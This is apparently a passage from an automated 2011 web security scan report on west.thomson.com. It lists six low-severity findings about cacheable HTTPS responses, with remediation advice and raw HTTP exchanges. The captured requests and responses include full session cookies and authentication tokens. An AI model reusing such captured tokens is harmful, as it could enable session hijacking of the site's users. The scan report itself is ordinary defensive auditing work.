bookstore@westgroup.com " class="StandardLinkBlue Bold">...[SNIP]... west.fed.govt@thomson.com " class="StandardLinkBlue Bold">...[SNIP]... west.customer.service@thomson.com " class="StandardLinkBlue Bold">...[SNIP]...
8. Cacheable HTTPS response
previous
There are 6 instances of this issue:
Issue description
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:Cache-control: no-store Pragma: no-cache
8.1. https://west.thomson.com/noexpire/font/knowledgebold-webfont-2010.woff
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/noexpire/font/knowledgebold-webfont-2010.woff
Request
GET /noexpire/font/knowledgebold-webfont-2010.woff HTTP/1.1/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=D645C478A4226280B49ADCFB61BAED10A26C9D485AE7330FE6C2B4009102B52EAE52172FA93AE5C8928AB8152791FC8B6D7AA367896CF4E988C1C2943CC82EC673F171127468F7BE4E42FE45AD24FA805AD6E7DDDB98506B24608BB0CD029E9FA40BFED7C8850C83E7770503138347EB4A85195337459C7452C4148A8831D95BD7A25EA645AB0DC8FD795ED0843602E0A53B1EBBB50B7869294EB4C4F94C569955C1B219142D70778D962072E4C700E489CF9193FA0332310D1D8CB14EE251FE9535262EC5993F6ED217FBBC84513DB0F3FB9CE39021DE8344BDEC8A158E6FBA94B8CD49; s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OKCache-Control: max-age=31536000 ...................FFTM...l........Y$@;GDEF........... ....OS/2.......X...`....cmap.......}......k.cvt .......<...<. .Hfpgm...........e../.gasp...p............glyf...|..Q....X...[SNIP]...
8.2. https://west.thomson.com/noexpire/font/knowledgelight-webfont-2010.woff
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/noexpire/font/knowledgelight-webfont-2010.woff
Request
GET /noexpire/font/knowledgelight-webfont-2010.woff HTTP/1.1/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=D645C478A4226280B49ADCFB61BAED10A26C9D485AE7330FE6C2B4009102B52EAE52172FA93AE5C8928AB8152791FC8B6D7AA367896CF4E988C1C2943CC82EC673F171127468F7BE4E42FE45AD24FA805AD6E7DDDB98506B24608BB0CD029E9FA40BFED7C8850C83E7770503138347EB4A85195337459C7452C4148A8831D95BD7A25EA645AB0DC8FD795ED0843602E0A53B1EBBB50B7869294EB4C4F94C569955C1B219142D70778D962072E4C700E489CF9193FA0332310D1D8CB14EE251FE9535262EC5993F6ED217FBBC84513DB0F3FB9CE39021DE8344BDEC8A158E6FBA94B8CD49; s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OKCache-Control: max-age=31536000 ...................FFTM...l........Y$@5GDEF........... ....OS/2.......V...`.a.?cmap.......}......k.cvt .......0...0....fpgm...........e../.gasp...d............glyf...p..S........[SNIP]...
8.3. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/Promotions/EmailPreferences/Login.aspx
Request
GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OK050051A95CC95A3B0888C03B9DBEF0A026D745D0656E2E3DE853394140B6D80EEE33684BAC22241C10BCEC46D800215998CBC7CB21197B52E754E19FAA6C1F1725A6249D03181F66A430ECE47F662E7EF119243B001BEA25F850311DCB9495BBDE849BAEAE38CFAF69EE6C71B979EC9A46B08E8C5B362E255E6FCD960E943F41886886E045C4EB97A5121632E495A2DE980E64EC33F053829F75AEDFBDE371B36DC072FBB362065481E66F8EFF61623D579526A71AC8DD9F30FF1BFAD99A5FA5D2AE551F509B6E57AC0127A7E82DD4063747DCDE458BCBBFA35D0CE53B82A; path=/Cache-Control: private /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
8.4. https://west.thomson.com/store/secure/EmptyBasket.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/secure/EmptyBasket.aspx
Request
GET /store/secure/EmptyBasket.aspx HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=0D1C43F14C3D0360D4C56BDD0D49E3A1E347C13F76ADC1B282235271457FAC648FB37FE6B223762A24E6CB268609BC8463ECB71442613CE6C286443DD8C796AD188F8568D73785118A509021BEABBD4E55D10E5F1E3A4F4A3F1B558AB2332C44A56F489B0571AEA92276AE792D9D8761A0FBB7322D072015D4B719941EFD8FCB5CDB63E1CEF01EF859C876D1DA920B7EB3539BA4B4D934B5A3CF2F56BB805BA3F3435E9F173B50A3D9F7C34D0C8E7180A2F74BC8118F96769794F6D4C7A36DCE92EEA8FE38E72E95AF86A85ADB9338C9E73EDA3652910D79D1A7D57B6EF7422F00DB82A9
Response
HTTP/1.1 200 OK459338884A46B49D0105C145D63087A0F6EA1AF1008AF8F10A6BE20B4B11D124F705A3B3E14AC22EC73DD213F5F9EEB5214BC1762EE7929A0F454C61A0BDCF1DEC78E1A8885681779E756F6C33BB53E5D00DC20A327C71B7A18A01CD2DEC0CB430995B2D528EAE5EDE656A06490C12141D8DC1BDB52EA377E9C528F52835D9BB8C6526E44BC00F17481EEE8BAF4CEFD033D588FC1950953DF71D7BEC464ACA7CC296D962C2F89E8B7BF9E2164F2A2485B2AD03B442B72330D47CEE8F0DEFDB9FFFF7F71AE584B4FEA6F98140E539AF54249B185FB8811D025A5E2F4D81C75; path=/Cache-Control: private /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
8.5. https://west.thomson.com/store/secure/ShippingInfo.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/secure/ShippingInfo.aspx
Request
GET /store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart HTTP/1.1/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_sq=thwest%3D%2526pid%253DBankruptcy%252520Exemption%252520Manual%25252C%2525202010%252520ed.%252520%252528West%252527s%252526%252523174%25253B%252520Bankruptcy%252520Series%252529%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BshowPopupBubble%252528%252527ctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524ctl00%252524popu%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=9DFF38C2ED245A836B638A4FD2BB05048EFDFD2A3F3BC8DC4D0876357DAC06B163234E108A8F0DA6FFB919F8831205FF1893BF274F77770E9447A6CF6832F99911CAEA4F06343A555BDF7037EBDAD0392A3B821D6A252C115D9D10A1FD2B10DE395F8581D4BBE49B8B4EF6A088A00BE982BA5CBAAC1C23CD6D40E8E10C4A8CB90101D3CE531D7618D4A99EC6ED09D86A6A87BEB92C84EBB5541C5F4267CA16C317ED73CD9AD52E9BCFFCFA39E7A4F7561999EF701967F4FAEE3513AC9E115F783D6CA97286E2B3D06563DA39F267FA170B8C51C76EEB06DDD6F99A112D49B9ED48435EDE
Response
HTTP/1.1 200 OKBBE47C7EEF54F80B6D25789CF3B0DE11279B4960956BC8BB0E345579BADF326956E9721B67D71932107D3B64238D6EE6707D06C81817121C5953C161DDD49619F87B8AE2E421C792976F48CA556F7DB0C834EB3BE231FCF4A767E58A07AA7485840E793C3A65F7DEB1BA7BD4CA2E971C144356D50FC6DD68AFCB7569D943E22EBDA2359D2DDAFEEB65197678B43B591B46F28E9EA05EC9F8FE84A521E37C1F57160F4EE7D67E36501BABC3987B29619274E9EBC26949903E1FDAEC56DB8129C91303E8A4BE5A28D8839FB0A532C6B8B24419839BF14AB2C51AD3259D6DF7F; path=/Cache-Control: private /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
8.6. https://west.thomson.com/support/customer-service/order-info.aspx
previous
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/support/customer-service/order-info.aspx
Request
GET /support/customer-service/order-info.aspx HTTP/1.1/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=E76869171E1A0ADDDC87DE0666682051A5ABA524C2901C7CCEF31A6788A7A438C98C00E7ABD27B50057AA9B35AF82318BE32CAAF21BCE46BA3E3E2EF6BAD7265022CF6605B0D106AF37CB15E717B49BE7FA125545B49CD98D1796358E96925E259D28F2A8CB5B16681BF5B9DE5EB533CEFC7E936BC98024D18199973772A2B0420054643FF9639F13C27CBBB80C1152B2BC7EF70BDEC6C72A6C3ED2F16912510EBC9C641BEB2DCBD2784D94A08DAC3A2CB0C92EBE86CA6DAE5A52262E83175C215F1D237D9058600C65D041AC94F24F8BD7FAFEA186A82F05284BBAB97540DA15E7C4840; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA
Response
HTTP/1.1 200 OK96EC21459B14B79587A583EC2F9BC37D2E75B5317EF0E65FAFEF6730683DB17DCF2BE06F0B1B98854DE5A707FC465E78510565D9EB9DAE71D857891B9157BA899B658EA734F816E3CE32760B05F6B24F34F4DF7A20D01665DF7E18DCAAC70E57C6EDF44A0197593C73CA0FAE6C559214D35FC361C5715FE43DBF19C70EBD085C78E9E5F286FC92ED8B559596ABC60CEFF4372C361E9E899AF7753D44DE2EF1A434F6907AE0EEE63371718A38CBFF23D5698B65E6F218C4AEADA2868A458441D2D6450C6DDD153EDB3A2CE7A069305EEEB72793F81C52FB84EB011536FEF0B; expires=Tue, 26-Apr-2011 21:13:49 GMT; path=/; HttpOnly7E664484BBE7EC8277401DE5ADF5C5AEAF45D558739ADCD8069717EDC476F9611DA2668E59CB60B963048A7292391B9104F44FFCFB680230472EE9A68B087279430B80A9137BCF51FCBBE8CAA2B5135B21DAB33E2FF00B71448413EC9C7D9166F621CB8C527C88854A6B0E4DFD5CD34D4666CDACDA3442EF9704AA677452920C07B5940C397045601366D36704513C6FE9B69419D140474085B16735382FEB803D48FC173BBAFD3334424BF0894189520BF2901A304307E3DC9E63E08D54BB0A62CFE50A8B440B11838DBAA606EC4F2C964E593D9C23819FB20FA690F28E5; path=/Cache-Control: private /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]...
Report generated by XSS.CX at Tue Apr 26 15:49:04 CDT 2011.